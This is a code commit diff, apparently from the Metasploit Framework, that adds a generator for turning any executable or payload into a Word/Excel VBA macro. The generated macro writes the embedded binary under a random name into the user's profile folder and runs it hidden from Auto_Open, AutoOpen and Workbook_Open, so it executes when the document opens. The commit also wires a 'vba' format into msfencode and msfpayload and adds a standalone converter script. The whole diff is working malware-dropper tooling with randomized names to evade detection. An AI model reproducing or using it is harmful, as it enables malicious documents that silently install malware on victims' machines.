Adds utlities for creating VBA scripts from an EXE (or payload)
git-svn-id: file:///home/svn/framework3/trunk@5893 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4bd81c7f2f
commit
a70e982369
|
@ -679,7 +679,68 @@ module Text
|
|||
|
||||
return mo
|
||||
end
|
||||
|
||||
def self.to_exe_vba(exe='')
|
||||
vba = ""
|
||||
pcs = (exe.length/2000)+1
|
||||
idx = 0
|
||||
|
||||
var_bytes = rand_text_alpha(rand(8)+8)
|
||||
var_initx = rand_text_alpha(rand(8)+8).capitalize
|
||||
|
||||
vba << "Dim #{var_bytes}(#{exe.length}) as Byte\r\n\r\n"
|
||||
1.upto(pcs) do |pc|
|
||||
max = 0
|
||||
vba << "Sub #{var_initx}#{pc}()\r\n"
|
||||
|
||||
while(c = exe[idx] and max < 2000)
|
||||
vba << "\t#{var_bytes}(#{idx}) = &H#{("%.2x" % c).upcase}\r\n"
|
||||
idx += 1
|
||||
max += 1
|
||||
end
|
||||
vba << "End Sub\r\n"
|
||||
end
|
||||
|
||||
var_lname = rand_text_alpha(rand(8)+8)
|
||||
var_lpath = rand_text_alpha(rand(8)+8)
|
||||
var_appnr = rand_text_alpha(rand(8)+8)
|
||||
var_datnr = rand_text_alpha(rand(8)+8)
|
||||
|
||||
vba << "Sub Auto_Open()\r\n"
|
||||
vba << "\tDim #{var_appnr} As Integer\r\n"
|
||||
vba << "\tDim #{var_datnr} As Integer\r\n"
|
||||
vba << "\tDim #{var_lname} As String\r\n"
|
||||
vba << "\tDim #{var_lpath} As String\r\n"
|
||||
vba << "\t#{var_lname} = \"#{rand_text_alpha(rand(8)+8)}.exe\"\r\n"
|
||||
vba << "\t#{var_lpath} = Environ(\"USERPROFILE\")\r\n"
|
||||
vba << "\tChDrive (#{var_lpath})\r\n"
|
||||
vba << "\tChDir (#{var_lpath})\r\n"
|
||||
vba << "\t#{var_datnr} = FreeFile()\r\n"
|
||||
vba << "\tOpen #{var_lname} For Binary Access Read Write As #{var_datnr}\r\n"
|
||||
|
||||
1.upto(pcs) do |pc|
|
||||
vba << "\t#{var_initx}#{pc}\r\n"
|
||||
end
|
||||
|
||||
vba << "\tPut #{var_datnr}, , #{var_bytes}\r\n"
|
||||
vba << "\tClose #{var_datnr}\r\n"
|
||||
vba << "\t#{var_appnr} = Shell(#{var_lname}, vbHide)\r\n"
|
||||
vba << "End Sub\r\n"
|
||||
|
||||
vba << "Sub AutoOpen()\r\n"
|
||||
vba << "\tAuto_Open\r\n"
|
||||
vba << "End Sub\r\n"
|
||||
|
||||
vba << "Sub Workbook_Open()\r\n"
|
||||
vba << "\tAuto_Open\r\n"
|
||||
vba << "End Sub\r\n"
|
||||
|
||||
end
|
||||
|
||||
def self.to_win32pe_vba(code = "\xcc", note="")
|
||||
to_exe_vba(to_win32pe(code, note))
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# Generators
|
||||
|
|
35
msfencode
35
msfencode
|
@ -15,7 +15,7 @@ $args = Rex::Parser::Arguments.new(
|
|||
"-i" => [ true, "Encode the contents of the supplied file path" ],
|
||||
"-m" => [ true, "Specifies an additional module search path" ],
|
||||
"-a" => [ true, "The architecture to encode as" ],
|
||||
"-t" => [ true, "The format to display the encoded buffer with (raw, ruby, perl, c)" ],
|
||||
"-t" => [ true, "The format to display the encoded buffer with (raw, ruby, perl, c, exe, vba)" ],
|
||||
"-b" => [ true, "The list of characters to avoid: '\\x00\\xff'" ],
|
||||
"-s" => [ true, "The maximum size of the encoded data" ],
|
||||
"-e" => [ true, "The encoder to use" ],
|
||||
|
@ -113,7 +113,7 @@ $args.parse(ARGV) { |opt, idx, val|
|
|||
when "-s"
|
||||
space = val.to_i
|
||||
when "-t"
|
||||
if (val =~ /^(perl|ruby|raw|c|exe)$/)
|
||||
if (val =~ /^(perl|ruby|raw|c|exe|vba)$/)
|
||||
fmt = val
|
||||
else
|
||||
$stderr.puts(OutError + "Invalid format: #{val}")
|
||||
|
@ -168,15 +168,8 @@ case cmd
|
|||
# Print it out
|
||||
$stderr.puts(OutStatus + "#{enc.refname} succeeded, final size #{raw.length}\n\n")
|
||||
|
||||
if(fmt != "exe")
|
||||
if(not output)
|
||||
$stdout.print(Msf::Simple::Buffer.transform(raw, fmt))
|
||||
else
|
||||
File.open(output, "wb") do |fd|
|
||||
fd.write(Msf::Simple::Buffer.transform(raw, fmt))
|
||||
end
|
||||
end
|
||||
else
|
||||
case fmt
|
||||
when 'exe'
|
||||
exe = Rex::Text.to_win32pe(buf, "")
|
||||
if(not output)
|
||||
$stdout.write(exe)
|
||||
|
@ -184,6 +177,24 @@ case cmd
|
|||
File.open(output, "wb") do |fd|
|
||||
fd.write(exe)
|
||||
end
|
||||
end
|
||||
when 'vba'
|
||||
exe = Rex::Text.to_win32pe(buf, "")
|
||||
vba = Rex::Text.to_exe_vba(exe)
|
||||
if(not output)
|
||||
$stdout.write(vba)
|
||||
else
|
||||
File.open(output, "wb") do |fd|
|
||||
fd.write(vba)
|
||||
end
|
||||
end
|
||||
else
|
||||
if(not output)
|
||||
$stdout.print(Msf::Simple::Buffer.transform(raw, fmt))
|
||||
else
|
||||
File.open(output, "wb") do |fd|
|
||||
fd.write(Msf::Simple::Buffer.transform(raw, fmt))
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -195,4 +206,4 @@ case cmd
|
|||
}
|
||||
|
||||
$stderr.puts(OutError + "No encoders succeeded.")
|
||||
end
|
||||
end
|
||||
|
|
25
msfpayload
25
msfpayload
|
@ -32,7 +32,7 @@ end
|
|||
$framework = Msf::Simple::Framework.create
|
||||
|
||||
if (ARGV.length <= 1)
|
||||
puts "\n" + " Usage: #{$0} <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable>\n"
|
||||
puts "\n" + " Usage: #{$0} <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>\n"
|
||||
puts dump_payloads
|
||||
exit
|
||||
end
|
||||
|
@ -57,10 +57,11 @@ cmd = ARGV.pop.downcase
|
|||
# Populate the framework datastore
|
||||
options = ARGV.join(',')
|
||||
|
||||
if (cmd =~ /^(p|y|r|c|j|x|b)/)
|
||||
if (cmd =~ /^(p|y|r|c|j|x|b|v)/)
|
||||
fmt = 'perl' if (cmd =~ /^p/)
|
||||
fmt = 'ruby' if (cmd =~ /^y/)
|
||||
fmt = 'raw' if (cmd =~ /^(r|x)/)
|
||||
fmt = 'raw' if (cmd =~ /^v/)
|
||||
fmt = 'c' if (cmd == 'c')
|
||||
fmt = 'js_be' if (cmd =~ /^j/ and Rex::Arch.endian(payload.arch) == ENDIAN_BIG)
|
||||
fmt = 'js_le' if (cmd =~ /^j/ and ! fmt)
|
||||
|
@ -89,8 +90,6 @@ if (cmd =~ /^(p|y|r|c|j|x|b)/)
|
|||
arch = payload.arch
|
||||
plat = payload.platform.platforms
|
||||
|
||||
|
||||
|
||||
if (arch.index(ARCH_X86))
|
||||
|
||||
# XXX: Automatically prepend stack adjustment
|
||||
|
@ -139,9 +138,23 @@ if (cmd =~ /^(p|y|r|c|j|x|b)/)
|
|||
$stderr.puts "No executable format support for this arch/platform"
|
||||
exit(-1)
|
||||
end
|
||||
|
||||
|
||||
if(cmd =~ /^v/)
|
||||
exe = Rex::Text.to_win32pe(buf, '')
|
||||
note =
|
||||
"'Created by msfpayload (http://www.metasploit.com).\r\n" +
|
||||
"'Payload: " + payload.refname + "\r\n" +
|
||||
"' Length: " + buf.length.to_s + "\r\n" +
|
||||
"'Options: " + options + "\r\n"
|
||||
|
||||
vba = note + "\r\n" + Rex::Text.to_exe_vba(exe)
|
||||
$stdout.write(vba)
|
||||
exit(0)
|
||||
end
|
||||
|
||||
$stdout.puts(buf)
|
||||
|
||||
|
||||
|
||||
elsif (cmd =~ /^(s|o)/)
|
||||
payload.datastore.import_options_from_s(ARGV.join('_|_'), '_|_')
|
||||
puts Msf::Serializer::ReadableText.dump_module(payload)
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
# This script converts an EXE to a VBA script for Word/Excel
|
||||
# Credit to PriestMaster for the original C code
|
||||
#
|
||||
|
||||
msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__
|
||||
$:.unshift(File.join(File.dirname(msfbase), '..', 'lib'))
|
||||
|
||||
require 'rex'
|
||||
|
||||
def usage
|
||||
$stderr.puts(" Usage: #{$0} [exe] [vba]\n")
|
||||
exit
|
||||
end
|
||||
|
||||
exe = ARGV.shift
|
||||
vba = ARGV.shift
|
||||
|
||||
if (not (exe and vba))
|
||||
usage
|
||||
end
|
||||
|
||||
out = File.new(vba, "w")
|
||||
inp = File.open(exe, "rb")
|
||||
|
||||
dat = ""
|
||||
while(buf = inp.read(8192))
|
||||
dat << buf
|
||||
end
|
||||
|
||||
out.write(Rex::Text.to_exe_vba(dat))
|
||||
out.close
|
||||
inp.close
|
||||
|
||||
$stderr.puts "[*] Converted #{dat.length} bytes of EXE into a VBA script"
|
Loading…
Reference in New Issue